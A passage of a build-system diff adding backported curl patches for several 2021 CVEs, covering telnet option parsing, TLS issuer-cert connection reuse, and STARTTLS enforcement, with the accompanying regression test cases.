457- result = Curl_ssl_addsessionid(conn, our_ssl_sessionid,
458+ result = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid,
459 0 /* unknown size */, sockindex);
460 if(result) {
461 Curl_ssl_sessionid_unlock(conn);
462--
4632.20.1
464
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22898.patch b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
new file mode 100644
index 0000000000..0800e10175
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
@@ -0,0 +1,26 @@
1From 39ce47f219b09c380b81f89fe54ac586c8db6bde Mon Sep 17 00:00:00 2001
2From: Harry Sintonen <sintonen@iki.fi>
3Date: Fri, 7 May 2021 13:09:57 +0200
4Subject: [PATCH] telnet: check sscanf() for correct number of matches
5
6CVE: CVE-2021-22898
7Upstream-Status: Backport
8Link: https://github.com/curl/curl/commit/39ce47f219b09c380b81f89fe54ac586c8db6bde
9Bug: https://curl.se/docs/CVE-2021-22898.html
10---
11 lib/telnet.c | 2 +-
12 1 file changed, 1 insertion(+), 1 deletion(-)
13
14diff --git a/lib/telnet.c b/lib/telnet.c
15index 26e0658ba9cc..fdd137fb0c04 100644
16--- a/lib/telnet.c
17+++ b/lib/telnet.c
18@@ -922,7 +922,7 @@ static void suboption(struct Curl_easy *data)
19 size_t tmplen = (strlen(v->data) + 1);
20 /* Add the variable only if it fits */
21 if(len + tmplen < (int)sizeof(temp)-6) {
22- if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
23+ if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
24 msnprintf((char *)&temp[len], sizeof(temp) - len,
25 "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
26 CURL_NEW_ENV_VALUE, varval);
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22924.patch b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
new file mode 100644
index 0000000000..68fde45ddf
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
@@ -0,0 +1,226 @@
1Subject: [PATCH] vtls: fix connection reuse checks for issuer cert and
2 case sensitivity CVE-2021-22924
3
4Reported-by: Harry Sintonen
5Bug: https://curl.se/docs/CVE-2021-22924.html
6CVE: CVE-2021-22924
7Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
8Signed-off-by: Mike Crowe <mac@mcrowe.com>
9---
10 lib/url.c | 5 +++--
11 lib/urldata.h | 2 +-
12 lib/vtls/gtls.c | 10 +++++-----
13 lib/vtls/nss.c | 4 ++--
14 lib/vtls/openssl.c | 12 ++++++------
15 lib/vtls/vtls.c | 23 ++++++++++++++++++-----
16 6 files changed, 35 insertions(+), 21 deletions(-)
17
18diff --git a/lib/url.c b/lib/url.c
19index 47fc66aed..eebad8d32 100644
20--- a/lib/url.c
21+++ b/lib/url.c
22@@ -3555,6 +3555,9 @@ static CURLcode create_conn(struct Curl_easy *data,
23 data->set.proxy_ssl.primary.CApath = data->set.str[STRING_SSL_CAPATH_PROXY];
24 data->set.ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_ORIG];
25 data->set.proxy_ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_PROXY];
26+ data->set.ssl.primary.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
27+ data->set.proxy_ssl.primary.issuercert =
28+ data->set.str[STRING_SSL_ISSUERCERT_PROXY];
29 data->set.ssl.primary.random_file = data->set.str[STRING_SSL_RANDOM_FILE];
30 data->set.proxy_ssl.primary.random_file =
31 data->set.str[STRING_SSL_RANDOM_FILE];
32@@ -3575,8 +3578,6 @@ static CURLcode create_conn(struct Curl_easy *data,
33
34 data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
35 data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
36- data->set.ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
37- data->set.proxy_ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_PROXY];
38 data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
39 data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
40 data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
41diff --git a/lib/urldata.h b/lib/urldata.h
42index fbb8b645e..615fbf369 100644
43--- a/lib/urldata.h
44+++ b/lib/urldata.h
45@@ -224,6 +224,7 @@ struct ssl_primary_config {
46 long version_max; /* max supported version the client wants to use*/
47 char *CApath; /* certificate dir (doesn't work on windows) */
48 char *CAfile; /* certificate to verify peer against */
49+ char *issuercert; /* optional issuer certificate filename */
50 char *clientcert;
51 char *random_file; /* path to file containing "random" data */
52 char *egdsocket; /* path to file containing the EGD daemon socket */
53@@ -240,7 +241,6 @@ struct ssl_config_data {
54 struct ssl_primary_config primary;
55 long certverifyresult; /* result from the certificate verification */
56 char *CRLfile; /* CRL to check certificate revocation */
57- char *issuercert;/* optional issuer certificate filename */
58 curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
59 void *fsslctxp; /* parameter for call back */
60 char *cert; /* client certificate file name */
61diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
62index 46e149c7d..8c051024f 100644
63--- a/lib/vtls/gtls.c
64+++ b/lib/vtls/gtls.c
65@@ -1059,7 +1059,7 @@ gtls_connect_step3(struct connectdata *conn,
66 if(!chainp) {
67 if(SSL_CONN_CONFIG(verifypeer) ||
68 SSL_CONN_CONFIG(verifyhost) ||
69- SSL_SET_OPTION(issuercert)) {
70+ SSL_CONN_CONFIG(issuercert)) {
71 #ifdef USE_TLS_SRP
72 if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
73 && SSL_SET_OPTION(username) != NULL
74@@ -1241,21 +1241,21 @@ gtls_connect_step3(struct connectdata *conn,
75 gnutls_x509_crt_t format */
76 gnutls_x509_crt_import(x509_cert, chainp, GNUTLS_X509_FMT_DER);
77
78- if(SSL_SET_OPTION(issuercert)) {
79+ if(SSL_CONN_CONFIG(issuercert)) {
80 gnutls_x509_crt_init(&x509_issuer);
81- issuerp = load_file(SSL_SET_OPTION(issuercert));
82+ issuerp = load_file(SSL_CONN_CONFIG(issuercert));
83 gnutls_x509_crt_import(x509_issuer, &issuerp, GNUTLS_X509_FMT_PEM);
84 rc = gnutls_x509_crt_check_issuer(x509_cert, x509_issuer);
85 gnutls_x509_crt_deinit(x509_issuer);
86 unload_file(issuerp);
87 if(rc <= 0) {
88 failf(data, "server certificate issuer check failed (IssuerCert: %s)",
89- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
90+ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
91 gnutls_x509_crt_deinit(x509_cert);
92 return CURLE_SSL_ISSUER_ERROR;
93 }
94 infof(data, "\t server certificate issuer check OK (Issuer Cert: %s)\n",
95- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
96+ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
97 }
98
99 size = sizeof(certbuf);
100diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
101index ef51b0d91..375c78b1b 100644
102--- a/lib/vtls/nss.c
103+++ b/lib/vtls/nss.c
104@@ -2151,9 +2151,9 @@ static CURLcode nss_do_connect(struct connectdata *conn, int sockindex)
105 if(result)
106 goto error;
107
108- if(SSL_SET_OPTION(issuercert)) {
109+ if(SSL_CONN_CONFIG(issuercert)) {
110 SECStatus ret = SECFailure;
111- char *nickname = dup_nickname(data, SSL_SET_OPTION(issuercert));
112+ char *nickname = dup_nickname(data, SSL_CONN_CONFIG(issuercert));
113 if(nickname) {
114 /* we support only nicknames in case of issuercert for now */
115 ret = check_issuer_cert(BACKEND->handle, nickname);
116diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
117index 64f43605a..7e81fd3a0 100644
118--- a/lib/vtls/openssl.c
119+++ b/lib/vtls/openssl.c
120@@ -3547,7 +3547,7 @@ static CURLcode servercert(struct connectdata *conn,
121 deallocating the certificate. */
122
123 /* e.g. match issuer name with provided issuer certificate */
124- if(SSL_SET_OPTION(issuercert)) {
125+ if(SSL_CONN_CONFIG(issuercert)) {
126 fp = BIO_new(BIO_s_file());
127 if(fp == NULL) {
128 failf(data,
129@@ -3560,10 +3560,10 @@ static CURLcode servercert(struct connectdata *conn,
130 return CURLE_OUT_OF_MEMORY;
131 }
132
133- if(BIO_read_filename(fp, SSL_SET_OPTION(issuercert)) <= 0) {
134+ if(BIO_read_filename(fp, SSL_CONN_CONFIG(issuercert)) <= 0) {
135 if(strict)
136 failf(data, "SSL: Unable to open issuer cert (%s)",
137- SSL_SET_OPTION(issuercert));
138+ SSL_CONN_CONFIG(issuercert));
139 BIO_free(fp);
140 X509_free(BACKEND->server_cert);
141 BACKEND->server_cert = NULL;
142@@ -3574,7 +3574,7 @@ static CURLcode servercert(struct connectdata *conn,
143 if(!issuer) {
144 if(strict)
145 failf(data, "SSL: Unable to read issuer cert (%s)",
146- SSL_SET_OPTION(issuercert));
147+ SSL_CONN_CONFIG(issuercert));
148 BIO_free(fp);
149 X509_free(issuer);
150 X509_free(BACKEND->server_cert);
151@@ -3585,7 +3585,7 @@ static CURLcode servercert(struct connectdata *conn,
152 if(X509_check_issued(issuer, BACKEND->server_cert) != X509_V_OK) {
153 if(strict)
154 failf(data, "SSL: Certificate issuer check failed (%s)",
155- SSL_SET_OPTION(issuercert));
156+ SSL_CONN_CONFIG(issuercert));
157 BIO_free(fp);
158 X509_free(issuer);
159 X509_free(BACKEND->server_cert);
160@@ -3594,7 +3594,7 @@ static CURLcode servercert(struct connectdata *conn,
161 }
162
163 infof(data, " SSL certificate issuer check ok (%s)\n",
164- SSL_SET_OPTION(issuercert));
165+ SSL_CONN_CONFIG(issuercert));
166 BIO_free(fp);
167 X509_free(issuer);
168 }
169diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
170index aaf73ef8f..8c681da14 100644
171--- a/lib/vtls/vtls.c
172+++ b/lib/vtls/vtls.c
173@@ -82,6 +82,16 @@
174 else \
175 dest->var = NULL;
176
177+static bool safecmp(char *a, char *b)
178+{
179+ if(a && b)
180+ return !strcmp(a, b);
181+ else if(!a && !b)
182+ return TRUE; /* match */
183+ return FALSE; /* no match */
184+}
185+
186+
187 bool
188 Curl_ssl_config_matches(struct ssl_primary_config* data,
189 struct ssl_primary_config* needle)
190@@ -91,11 +101,12 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
191 (data->verifypeer == needle->verifypeer) &&
192 (data->verifyhost == needle->verifyhost) &&
193 (data->verifystatus == needle->verifystatus) &&
194- Curl_safe_strcasecompare(data->CApath, needle->CApath) &&
195- Curl_safe_strcasecompare(data->CAfile, needle->CAfile) &&
196- Curl_safe_strcasecompare(data->clientcert, needle->clientcert) &&
197- Curl_safe_strcasecompare(data->random_file, needle->random_file) &&
198- Curl_safe_strcasecompare(data->egdsocket, needle->egdsocket) &&
199+ safecmp(data->CApath, needle->CApath) &&
200+ safecmp(data->CAfile, needle->CAfile) &&
201+ safecmp(data->issuercert, needle->issuercert) &&
202+ safecmp(data->clientcert, needle->clientcert) &&
203+ safecmp(data->random_file, needle->random_file) &&
204+ safecmp(data->egdsocket, needle->egdsocket) &&
205 Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
206 Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
207 Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
208@@ -117,6 +128,7 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
209
210 CLONE_STRING(CApath);
211 CLONE_STRING(CAfile);
212+ CLONE_STRING(issuercert);
213 CLONE_STRING(clientcert);
214 CLONE_STRING(random_file);
215 CLONE_STRING(egdsocket);
216@@ -131,6 +143,7 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
217 {
218 Curl_safefree(sslc->CApath);
219 Curl_safefree(sslc->CAfile);
220+ Curl_safefree(sslc->issuercert);
221 Curl_safefree(sslc->clientcert);
222 Curl_safefree(sslc->random_file);
223 Curl_safefree(sslc->egdsocket);
224--
2252.30.2
226
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22925.patch b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
new file mode 100644
index 0000000000..13b55f76be
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
@@ -0,0 +1,43 @@
1Subject: [PATCH] telnet: fix option parser to not send uninitialized
2 contents CVE-2021-22925
3
4Reported-by: Red Hat Product Security
5Bug: https://curl.se/docs/CVE-2021-22925.html
6CVE: CVE-2021-22925
7Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
8Signed-off-by: Mike Crowe <mac@mcrowe.com>
9---
10 lib/telnet.c | 17 +++++++++++------
11 1 file changed, 11 insertions(+), 6 deletions(-)
12
13diff --git a/lib/telnet.c b/lib/telnet.c
14index 4bf4c652c..3347ad6d1 100644
15--- a/lib/telnet.c
16+++ b/lib/telnet.c
17@@ -967,12 +967,17 @@ static void suboption(struct connectdata *conn)
18 size_t tmplen = (strlen(v->data) + 1);
19 /* Add the variable only if it fits */
20 if(len + tmplen < (int)sizeof(temp)-6) {
21- if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
22- msnprintf((char *)&temp[len], sizeof(temp) - len,
23- "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
24- CURL_NEW_ENV_VALUE, varval);
25- len += tmplen;
26- }
27+ int rv;
28+ char sep[2] = "";
29+ varval[0] = 0;
30+ rv = sscanf(v->data, "%127[^,]%1[,]%127s", varname, sep, varval);
31+ if(rv == 1)
32+ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
33+ "%c%s", CURL_NEW_ENV_VAR, varname);
34+ else if(rv >= 2)
35+ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
36+ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
37+ CURL_NEW_ENV_VALUE, varval);
38 }
39 }
40 msnprintf((char *)&temp[len], sizeof(temp) - len,
41--
422.30.2
43
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
new file mode 100644
index 0000000000..4afd755149
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
@@ -0,0 +1,86 @@
1Backport of:
2
3From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001
4From: Daniel Stenberg <daniel@haxx.se>
5Date: Mon, 21 Sep 2020 09:15:51 +0200
6Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy"
7
8When using HTTPS proxy, SSL is used but not in the view of the FTP
9protocol handler itself so separate the connection's use of SSL from the
10FTP control connection's sue.
11
12Reported-by: Mingtao Yang
13Fixes #5523
14Closes #6006
15
16Upstream-Status: backport from 7.68.0-1ubuntu2.7
17Signed-off-by: Mike Crowe <mac@mcrowe.com>
18---
19 lib/ftp.c | 13 ++++++-------
20 lib/urldata.h | 1 +
21 2 files changed, 7 insertions(+), 7 deletions(-)
22
23diff --git a/lib/ftp.c b/lib/ftp.c
24index 3382772..677527f 100644
25--- a/lib/ftp.c
26+++ b/lib/ftp.c
27@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn)
28 {
29 CURLcode result = CURLE_OK;
30
31- if(conn->ssl[FIRSTSOCKET].use) {
32+ if(conn->bits.ftp_use_control_ssl) {
33 /* PBSZ = PROTECTION BUFFER SIZE.
34
35 The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says:
36@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
37 }
38 #endif
39
40- if(data->set.use_ssl &&
41- (!conn->ssl[FIRSTSOCKET].use ||
42- (conn->bits.proxy_ssl_connected[FIRSTSOCKET] &&
43- !conn->proxy_ssl[FIRSTSOCKET].use))) {
44- /* We don't have a SSL/TLS connection yet, but FTPS is
45+ if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) {
46+ /* We don't have a SSL/TLS control connection yet, but FTPS is
47 requested. Try a FTPS connection now */
48
49 ftpc->count3 = 0;
50@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
51 result = Curl_ssl_connect(conn, FIRSTSOCKET);
52 if(!result) {
53 conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */
54+ conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */
55 result = ftp_state_user(conn);
56 }
57 }
58@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn)
59 *
60 */
61 static CURLcode ftp_connect(struct connectdata *conn,
62- bool *done) /* see description above */
63+ bool *done) /* see description above */
64 {
65 CURLcode result;
66 struct ftp_conn *ftpc = &conn->proto.ftpc;
67@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn,
68 result = Curl_ssl_connect(conn, FIRSTSOCKET);
69 if(result)
70 return result;
71+ conn->bits.ftp_use_control_ssl = TRUE;
72 }
73
74 Curl_pp_init(pp); /* init the generic pingpong data */
75diff --git a/lib/urldata.h b/lib/urldata.h
76index ff2d686..d1fb4a9 100644
77--- a/lib/urldata.h
78+++ b/lib/urldata.h
79@@ -461,6 +461,7 @@ struct ConnectBits {
80 EPRT doesn't work we disable it for the forthcoming
81 requests */
82 BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */
83+ BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */
84 #endif
85 BIT(netrc); /* name+password provided by netrc */
86 BIT(userpwd_in_url); /* name+password found in url */
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
new file mode 100644
index 0000000000..98032d8b78
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
@@ -0,0 +1,328 @@
1Backport of:
2
3From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001
4From: Patrick Monnerat <patrick@monnerat.net>
5Date: Wed, 8 Sep 2021 11:56:22 +0200
6Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd
7
8In imap and pop3, check if TLS is required even when capabilities
9request has failed.
10
11In ftp, ignore preauthentication (230 status of server greeting) if TLS
12is required.
13
14Bug: https://curl.se/docs/CVE-2021-22946.html
15Upstream-Status: backport from 7.68.0-1ubuntu2.7
16Signed-off-by: Mike Crowe <mac@mcrowe.com>
17CVE: CVE-2021-22946
18---
19 lib/ftp.c | 9 ++++---
20 lib/imap.c | 24 ++++++++----------
21 lib/pop3.c | 33 +++++++++++-------------
22 tests/data/Makefile.inc | 2 ++
23 tests/data/test984 | 56 +++++++++++++++++++++++++++++++++++++++++
24 tests/data/test985 | 54 +++++++++++++++++++++++++++++++++++++++
25 tests/data/test986 | 53 ++++++++++++++++++++++++++++++++++++++
26 7 files changed, 195 insertions(+), 36 deletions(-)
27 create mode 100644 tests/data/test984
28 create mode 100644 tests/data/test985
29 create mode 100644 tests/data/test986
30
31diff --git a/lib/ftp.c b/lib/ftp.c
32index 677527f..91b43d8 100644
33--- a/lib/ftp.c
34+++ b/lib/ftp.c
35@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
36 /* we have now received a full FTP server response */
37 switch(ftpc->state) {
38 case FTP_WAIT220:
39- if(ftpcode == 230)
40- /* 230 User logged in - already! */
41- return ftp_state_user_resp(conn, ftpcode, ftpc->state);
42+ if(ftpcode == 230) {
43+ /* 230 User logged in - already! Take as 220 if TLS required. */
44+ if(data->set.use_ssl <= CURLUSESSL_TRY ||
45+ conn->bits.ftp_use_control_ssl)
46+ return ftp_state_user_resp(conn, ftpcode, ftpc->state);
47+ }
48 else if(ftpcode != 220) {
49 failf(data, "Got a %03d ftp-server response when 220 was expected",
50 ftpcode);
51diff --git a/lib/imap.c b/lib/imap.c
52index 66172bd..9880ce1 100644
53--- a/lib/imap.c
54+++ b/lib/imap.c
55@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn,
56 line += wordlen;
57 }
58 }
59- else if(imapcode == IMAP_RESP_OK) {
60- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
61- /* We don't have a SSL/TLS connection yet, but SSL is requested */
62- if(imapc->tls_supported)
63- /* Switch to TLS connection now */
64- result = imap_perform_starttls(conn);
65- else if(data->set.use_ssl == CURLUSESSL_TRY)
66- /* Fallback and carry on with authentication */
67- result = imap_perform_authentication(conn);
68- else {
69- failf(data, "STARTTLS not supported.");
70- result = CURLE_USE_SSL_FAILED;
71- }
72+ else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
73+ /* PREAUTH is not compatible with STARTTLS. */
74+ if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) {
75+ /* Switch to TLS connection now */
76+ result = imap_perform_starttls(conn);
77 }
78- else
79+ else if(data->set.use_ssl <= CURLUSESSL_TRY)
80 result = imap_perform_authentication(conn);
81+ else {
82+ failf(data, "STARTTLS not available.");
83+ result = CURLE_USE_SSL_FAILED;
84+ }
85 }
86 else
87 result = imap_perform_authentication(conn);
88diff --git a/lib/pop3.c b/lib/pop3.c
89index 57c1373..145b2b4 100644
90--- a/lib/pop3.c
91+++ b/lib/pop3.c
92@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code,
93 }
94 }
95 }
96- else if(pop3code == '+') {
97- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
98- /* We don't have a SSL/TLS connection yet, but SSL is requested */
99- if(pop3c->tls_supported)
100- /* Switch to TLS connection now */
101- result = pop3_perform_starttls(conn);
102- else if(data->set.use_ssl == CURLUSESSL_TRY)
103- /* Fallback and carry on with authentication */
104- result = pop3_perform_authentication(conn);
105- else {
106- failf(data, "STLS not supported.");
107- result = CURLE_USE_SSL_FAILED;
108- }
109- }
110- else
111- result = pop3_perform_authentication(conn);
112- }
113 else {
114 /* Clear text is supported when CAPA isn't recognised */
115- pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
116+ if(pop3code != '+')
117+ pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
118
119- result = pop3_perform_authentication(conn);
120+ if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use)
121+ result = pop3_perform_authentication(conn);
122+ else if(pop3code == '+' && pop3c->tls_supported)
123+ /* Switch to TLS connection now */
124+ result = pop3_perform_starttls(conn);
125+ else if(data->set.use_ssl <= CURLUSESSL_TRY)
126+ /* Fallback and carry on with authentication */
127+ result = pop3_perform_authentication(conn);
128+ else {
129+ failf(data, "STLS not supported.");
130+ result = CURLE_USE_SSL_FAILED;
131+ }
132 }
133
134 return result;
135diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
136index f9535a6..0fa6799 100644
137--- a/tests/data/Makefile.inc
138+++ b/tests/data/Makefile.inc
139@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
140 test954 test955 test956 test957 test958 test959 test960 test961 test962 \
141 test963 test964 test965 test966 test967 test968 test969 \
142 \
143+test984 test985 test986 \
144+\
145 test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
146 test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \
147 test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \
148diff --git a/tests/data/test984 b/tests/data/test984
149new file mode 100644
150index 0000000..e573f23
151--- /dev/null
152+++ b/tests/data/test984
153@@ -0,0 +1,56 @@
154+<testcase>
155+<info>
156+<keywords>
157+IMAP
158+STARTTLS
159+</keywords>
160+</info>
161+
162+#
163+# Server-side
164+<reply>
165+<servercmd>
166+REPLY CAPABILITY A001 BAD Not implemented
167+</servercmd>
168+</reply>
169+
170+#
171+# Client-side
172+<client>
173+<features>
174+SSL
175+</features>
176+<server>
177+imap
178+</server>
179+ <name>
180+IMAP require STARTTLS with failing capabilities
181+ </name>
182+ <command>
183+imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd
184+</command>
185+<file name="log/upload%TESTNUMBER">
186+Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
187+From: Fred Foobar <foobar@example.COM>
188+Subject: afternoon meeting
189+To: joe@example.com
190+Message-Id: <B27397-0100000@example.COM>
191+MIME-Version: 1.0
192+Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
193+
194+Hello Joe, do you think we can meet at 3:30 tomorrow?
195+</file>
196+</client>
197+
198+#
199+# Verify data after the test has been "shot"
200+<verify>
201+# 64 is CURLE_USE_SSL_FAILED
202+<errorcode>
203+64
204+</errorcode>
205+<protocol>
206+A001 CAPABILITY
207+</protocol>
208+</verify>
209+</testcase>
210diff --git a/tests/data/test985 b/tests/data/test985
211new file mode 100644
212index 0000000..d0db4aa
213--- /dev/null
214+++ b/tests/data/test985
215@@ -0,0 +1,54 @@
216+<testcase>
217+<info>
218+<keywords>
219+POP3
220+STARTTLS
221+</keywords>
222+</info>
223+
224+#
225+# Server-side
226+<reply>
227+<servercmd>
228+REPLY CAPA -ERR Not implemented
229+</servercmd>
230+<data nocheck="yes">
231+From: me@somewhere
232+To: fake@nowhere
233+
234+body
235+
236+--
237+ yours sincerely
238+</data>
239+</reply>
240+
241+#
242+# Client-side
243+<client>
244+<features>
245+SSL
246+</features>
247+<server>
248+pop3
249+</server>
250+ <name>
251+POP3 require STARTTLS with failing capabilities
252+ </name>
253+ <command>
254+pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd
255+ </command>
256+</client>
257+
258+#
259+# Verify data after the test has been "shot"
260+<verify>
261+# 64 is CURLE_USE_SSL_FAILED
262+<errorcode>
263+64
264+</errorcode>
265+<protocol>
266+CAPA
267+</protocol>
268+</verify>
269+</testcase>
270diff --git a/tests/data/test986 b/tests/data/test986
271new file mode 100644
272index 0000000..a709437
273--- /dev/null
274+++ b/tests/data/test986
275@@ -0,0 +1,53 @@
276+<testcase>
277+<info>
278+<keywords>
279+FTP
280+STARTTLS
281+</keywords>
282+</info>
283+
284+#
285+# Server-side
286+<reply>
287+<servercmd>
288+REPLY welcome 230 Welcome
289+REPLY AUTH 500 unknown command
290+</servercmd>
291+</reply>
292+
293+# Client-side
294+<client>
295+<features>
296+SSL
297+</features>
298+<server>
299+ftp
300+</server>
301+ <name>
302+FTP require STARTTLS while preauthenticated
303+ </name>
304+<file name="log/test%TESTNUMBER.txt">
305+data
306+ to
307+ see
308+that FTPS
309+works
310+ so does it?
311+</file>
312+ <command>
313+--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret
314+</command>
315+</client>
316+
317+# Verify data after the test has been "shot"
318+<verify>
319+# 64 is CURLE_USE_SSL_FAILED
320+<errorcode>
321+64
322+</errorcode>
323+<protocol>
324+AUTH SSL
325+AUTH TLS
326+</protocol>
327+</verify>
328+</testcase>
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
new file mode 100644
index 0000000000..070a328e27
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
@@ -0,0 +1,352 @@
1Backport of:
2
3From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001
4From: Patrick Monnerat <patrick@monnerat.net>
5Date: Tue, 7 Sep 2021 13:26:42 +0200
6Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response
7 pipelining
8
9If a server pipelines future responses within the STARTTLS response, the
10former are preserved in the pingpong cache across TLS negotiation and
11used as responses to the encrypted commands.
12
13This fix detects pipelined STARTTLS responses and rejects them with an
14error.
15
16Bug: https://curl.se/docs/CVE-2021-22947.html
17Upstream-Status: backport from 7.68.0-1ubuntu2.7
18Signed-off-by: Mike Crowe <mac@mcrowe.com>
19CVE: CVE-2021-22947
20
21---
22 lib/ftp.c | 3 +++
23 lib/imap.c | 4 +++
24 lib/pop3.c | 4 +++
25 lib/smtp.c | 4 +++
26 tests/data/Makefile.inc | 2 ++
27 tests/data/test980 | 52 ++++++++++++++++++++++++++++++++++++
28 tests/data/test981 | 59 +++++++++++++++++++++++++++++++++++++++++
29 tests/data/test982 | 57 +++++++++++++++++++++++++++++++++++++++
30 tests/data/test983 | 52 ++++++++++++++++++++++++++++++++++++
31 9 files changed, 237 insertions(+)
32 create mode 100644 tests/data/test980
33 create mode 100644 tests/data/test981
34 create mode 100644 tests/data/test982
35 create mode 100644 tests/data/test983
36
37diff --git a/lib/ftp.c b/lib/ftp.c
38index 91b43d8..31a34e8 100644
39--- a/lib/ftp.c
40+++ b/lib/ftp.c
41@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
42 case FTP_AUTH:
43 /* we have gotten the response to a previous AUTH command */
44
45+ if(pp->cache_size)
46+ return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. */
47+
48 /* RFC2228 (page 5) says:
49 *
50 * If the server is willing to accept the named security mechanism,
51diff --git a/lib/imap.c b/lib/imap.c
52index 9880ce1..0ca700f 100644
53--- a/lib/imap.c
54+++ b/lib/imap.c
55@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn,
56
57 (void)instate; /* no use for this yet */
58
59+ /* Pipelining in response is forbidden. */
60+ if(data->conn->proto.imapc.pp.cache_size)
61+ return CURLE_WEIRD_SERVER_REPLY;
62+
